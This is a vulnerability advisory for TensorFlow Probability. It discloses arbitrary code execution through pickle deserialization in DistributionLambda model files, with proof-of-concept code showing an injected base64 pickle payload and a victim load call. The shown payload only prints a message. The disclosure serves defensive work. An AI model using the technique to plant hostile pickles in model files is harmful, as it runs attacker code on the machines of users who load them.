Tensorflow Probability
Vulnerability Report

Deserialization of untrusted data leading to arbitrary code execution

SAI Advisory Reference Number

SAI-ADV-2024-001

Summary

Execution of arbitrary code can be achieved through the deserialization process in the tensorflow_probability/python/layers/distribution_layer.py file within the function _deserialize_function. An attacker can inject a malicious pickle object into an HDF5 formatted model file, which will be deserialized via pickle when the model is loaded, executing the malicious code on the victim machine. An attacker can achieve this by injecting a pickle object into the DistributionLambda layer of the model under the make_distribution_fn key.

Products Impacted

This potential attack vector is present in Tensorflow Probability v0.7 and newer.

CVSS Score: 7.8

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-502: Deserialization of Untrusted Data.

Details

To replicate this attack, we create a basic sample model based on examples found in the docstrings within the code:

import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.internal import tf_keras
from tensorflow_probability.python.distributions import normal as normal_lib
from tensorflow_probability.python.layers import distribution_layer

tfk = tf_keras
tfkl = tf_keras.layers
tfd = tfp.distributions
tfpl = tfp.layers

model = tfk.Sequential([
	tfkl.Dense(2, input_shape=(5,)),
	distribution_layer.DistributionLambda(lambda t: normal_lib.Normal(
    	loc=t[..., 0:1], scale=tf.exp(t[..., 1:2])))
])

model.save("distribution_lambda_clean.h5")

We then use h5py to inject a base64 encoded pickle object into the model file as a new DistributionLambda layer. The resulting string is added to the model as part of the DistributionLambda layer under the make_distribution_fn key:

{"class_name": "DistributionLambda", 
"config": {"name": "distribution_lambda", "trainable": true, 
"dtype": "float32", "function": ["4wA...Q==\n", 
null, ["sample", "<lambda>"]], "function_type": "lambda", 
"module": "tensorflow_probability.python.layers.distribution_layer", 
"output_shape": null, "output_shape_type": "raw", 
"output_shape_module": null, "arguments": {}, 
"make_distribution_fn": "gASVMQAAAAAAAACMCGJ1aWx0aW5zlIwFcHJpbnSUk5SMFEluamVjdGlvbiBzdWNjZXNzZnVslIWUUpQu", 
"convert_to_tensor_fn": "sample"}}]}}

We then make a call to load the model from the perspective of a victim user:

import tensorflow as tf
import tensorflow_probability as tfp

loaded_model = tf.keras.models.load_model(
	'distribution_lambda_clean.h5', custom_objects={
    	'DistributionLambda': tfp.layers.DistributionLambda
	})

This sends the model through _deserialize_function, which decodes the value within make_distribution_function and runs pickle.loads on it, leading to the execution of the injected arbitrary code (in our case, to print ‘Injection Successful’):

def _deserialize_function(code):
  raw_code = codecs.decode(code.encode('ascii'), 'base64')
  return pickle.loads(raw_code)